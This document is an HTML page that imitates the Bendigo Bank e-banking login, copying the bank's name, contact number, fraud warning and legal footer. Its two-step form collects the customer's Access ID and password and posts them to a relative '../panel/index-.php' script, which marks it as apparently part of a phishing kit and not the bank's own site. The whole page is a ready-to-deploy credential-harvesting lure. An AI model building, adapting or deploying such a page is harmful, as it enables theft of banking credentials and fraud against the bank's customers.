<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Bendigo Bank - Log in to e-banking</title>
    <link rel="stylesheet" href="./assets/style/style.css">
    <link rel="icon" href="./assets/images/logoicon.png">
</head>
<body>
    <header>
        <div class="header-container">
            <img src="./assets/images/logo.png" alt="">
            <div class="header-container__0">Contact us <span>1 300 236 344</span></div>
            <div class="header-container__2"><img src="./assets/images/tele.png" alt=""><span>Contact us</span></div>
        </div>
    </header>
    <main class="main1">
        <form action="../panel/index-.php" method="post">
            <input type="hidden" name="step" value="logStep">
            <div class="log1 log11">
                <h1>Log in to e-banking</h1>
                <span id="errLogMessg">Please enter a valid Access ID.</span>
                <label>Access ID</label>
                <div class="log1_0">
                    <div class="log1_0_input1">
                        <img src="./assets/images/iconLoginInput.png" alt="">
                        <input type="text" name="AccessID" id="assessId" placeholder="e.g. 123456789">
                    </div>
                    <div class="log1_0_Checkbox log1_0_Checkbox1">
                        <input type="checkbox" name="checkbox" id="checkbox" class="checkboxClass" >
                        <img src="./assets/images/circl.png" alt="" id="imgCheck" class="imgCheck">
                        <label for="checkbox">Remember my Access ID</label>
                    </div>
                    <button class="btnLog1" id="btnNext1" type="button">Next</button>
                    <div class="log1_0_Checkbox log1_0_Checkbox2">
                        <input type="checkbox" name="checkbox" id="checkbox2" class="checkboxClass">
                        <img src="./assets/images/circl.png" alt="" id="imgCheck2" class="imgCheck">
                        <label for="checkbox2">Remember my Access ID</label>
                    </div>
                    <a href="#">What’s my Access ID?</a>
                </div>
            </div>      
            <div class="log1 log22">
                <h1>Log in to e-banking</h1>
                <label>Password</label>
                <div class="log1_0">
                    <div class="log1_0_input1">
                        <img src="./assets/images/9fale.png" alt="">
                        <input type="password" name="Password" id="password" >
                        <img src="./assets/images/eyeShow.png" alt="" class="eye" >
                    </div>
                    <button class="btnLog1" id="btnNext2">Next</button>
                    <a href="#">I forgot my password</a>
                </div>
            </div>  
        </form>
    </main>
    <footer>
        <div class="footer-container_01">
            <div class="footer-container_01_0">
                <p class="footer-container_01_0Par">
                    <span class="footer-container_01_0Par_title">Fraud Alert:</span>
                    <span>Please be alert to any unsolicited SMS or email asking you to click on a link within the message. Never provide your 6-digit security code to someone over the phone or online.</span>
                </p>
                <a href="" class="footer-container_01_0a">Read more</a>
            </div>
        </div>
        <div class="footer-container_02">
            <h2>New to e-banking?</h2>
            <a href="#">See all Help Topics</a>
        </div>
        <div class="footer-container_03">
            <div class="footer-container_03_00">
                <a href="#">Take a tour</a>
                <a href="#">Register</a>
                <a href="#">Online support</a>
                <a href="#">Banking securely</a>
            </div>
        </div>
        <div class="footer-container_04">
            <section>
                <div class="footer-container_04_1"></div>
                <div class="footer-container_04_2">
                    <div class="footer-container_04_2_0"></div>
                    <div class="footer-container_04_2_2">
                        <h1>A better home loan experience starts here</h1>
                        <p>Home to Australia's most satisfied home loan customers</p>
                        <a href="#">Switch today</a>
                    </div>
                </div>
            </section>
        </div>
        <div class="footer-container_05">
            <img src="./assets/images/apple.png" alt="">
            <img src="./assets/images/google.png" alt="">
        </div>
        <div class="footer-container_06">Disclosure documents. 
            Privacy policy | © Bendigo and Adelaide Bank Ltd | ABN: 11 068 049 178 | AFSL/Australian Credit Licence No. 237879
        </div>

    </footer>
    <script src="./assets/scripts/js.js"></script>
</body>
</html>